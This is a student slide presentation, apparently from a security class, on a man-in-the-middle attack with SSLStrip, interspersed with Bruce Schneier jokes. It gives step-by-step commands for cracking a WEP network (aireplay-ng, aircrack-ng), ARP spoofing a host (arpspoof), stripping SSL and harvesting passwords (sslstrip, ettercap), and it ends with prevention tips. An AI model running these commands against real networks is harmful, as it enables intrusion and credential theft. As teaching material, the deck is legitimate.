7/31/2019 mitm - Man in the midle

1/18

Man-in-the-Middle

Attack With SSL StripKyle Benson

Trevor KiernanGlen Saunders

Bruce Schneier's earliest childhood

memory is encrypted .

7/31/2019 mitm - Man in the midle

2/18

What is SSL?Secure Socket Layer Predecessor to Transport Layer

Security (TLS)Establishes a secure connectionbetween two computersImportant for banking sites and

othersAuthenticates: the server is actuallywho it says it is

Bruce Schneier's p is irrational, and his q is imaginary.

7/31/2019 mitm - Man in the midle

3/18

Runs on port 443 (not http's port 80) Client sends server hello and certificate

Server sends a signed certificate Verified by Certificate Authority such as

Verisign Certificate used to encrypt data

How Does it Work?

7/31/2019 mitm - Man in the midle

4/18

What is MITM?

Alice is trying to talk to Bob Eve jumps in the middle

ARP spoofing (wireless) Physical insertion (wired)

Eve tells Bob she is Alice and Alice thatshe is Bob

Bruce Schneier killed Eve and Mallory with a birthday attack!

7/31/2019 mitm - Man in the midle

5/18

What is MITM? When Alice sends something to Eve

(thinking she's Bob), Eve can read it Eve forwards this information to Bob Bob replies to Eve (thinking she's Alice) Eve can read e-mail and intercept

supposedly secure data (user nameand passwords!)

Bruce Schneier is always the Man in the Middle.

7/31/2019 mitm - Man in the midle

6/18

What is ARP Spoofing? ARP = address resolution protocol Alice sends ARP request (who is

192.168.1.1?) Eve replies before router can so that

Alice thinks she is the router Now Alice's ARP cache is poisoned;

thinks Eve is the router Eve forwards packets to her router

7/31/2019 mitm - Man in the midle

7/18

What is SSLStrip? Performs afforementioned MITM attack Forwards all regular HTTP traffic Changes Alice's HTTP request to

HTTPS Forwards this request via HTTPS to

Bob Explicit HTTPS request is sent a fake

certificate signed by Eve Replaces images with secure lockBruce Schneier can draw a perfect circle with an Etch-a-

Sketch.

7/31/2019 mitm - Man in the midle

8/18

Capturing Information Ettercap pulls passwords and user

names for many different programsand protocols

Displays Bob's IP and URL SSLStrip creates a log file

Bruce Schneier can break elliptic curve cryptography by bending it to a circle.

7/31/2019 mitm - Man in the midle

9/18

What we did 1. Scan for networks 2. Crack a network 3. Connect to the cracked network 4. Learn about a host on the network 5. MITM on that Host 6. Strip his/her SSL 7. Scan for usernames and passwords 8. Exit gracefully

7/31/2019 mitm - Man in the midle

10/18

Scanning for Networks Airodump-ng wlan1

Bruce Schneier can divide by zero.

7/31/2019 mitm - Man in the midle

11/18

Crack it airodump-ng -c 11 -w target_router

wlan1 & aireplay-ng -1 0 -e target_router -h

[faked mac address] wlan1 after successful connection, aireplay-ng -3 -e target_router -h [faked

mac] wlan1 let the data rate climb and aircrack-ng target_router-01.cap Within 5 minutes you should have the

WEP key. :-D

7/31/2019 mitm - Man in the midle

12/18

Connect

Connect to the router with the card you just attacked with. It should still have the same faked mac

address it was set to in the previousarp-replay attack

So now its time for some recon

The tattoos on Bruce Schneier's fists say "Alice" and "Bob". You don't want to make him exchange keys over

your face.

7/31/2019 mitm - Man in the midle

13/18

RECON

Nmap -sP 192.168.1.0/28 This keeps the packet count lower and

limits it to pinging Find a host

We liked 192.168.1.2 Ran an os fingerprint on it and checked

which versions open ports were using This generates a lot of traffic This host looked good, and responded

to our probes, so lets MITM.

Bruce Schneier counts in binary. With his fists.

C il d 't B S h i B S h i

7/31/2019 mitm - Man in the midle

14/18

RECON homing in

Compilers don't warn Bruce Schneier, Bruce Schneier warns compilers.

7/31/2019 mitm - Man in the midle

15/18

MITM

arpspoof -i wlan0 -t [their ip] [router ip] arpspoof -i wlan0 -t 192.168.1.2

192.168.1.1

Bruce Schneier is always the Man in the Middle.

7/31/2019 mitm - Man in the midle

16/18

SSL strip

sslstrip -a -k -f -a : log all ssl traffic -k : kill current sessions

-f : insert a lock icon in their connections

Bruce Schneier's work isn't peer reviewed. He has no peers.

7/31/2019 mitm - Man in the midle

17/18

Passwords from the stream

ettercap -T -q -i wlan0 -T : text only -q : do not display packet contents

-i : interface to use This will log traffic over our connection

and filter the target's passwords,causing them to show in our window.

We can pipe this to a file as well.

The set of Bruce Schneier's weaknesses is amathematical constant. It is represented by the symbol

.

If Bruce Schneier wants your plaintext, he'll just

7/31/2019 mitm - Man in the midle

18/18

How to Prevent? Secure your damn network! (WEP is

NOT secure!) Wireshark

ARP replies appearing very frequently Invalid certificate error Nmap scans

Don't accept certificates that aren'tverified Static ARP tables

If Bruce Schneier wants your plaintext, he ll just squeeze it out of the ciphertext using his barehands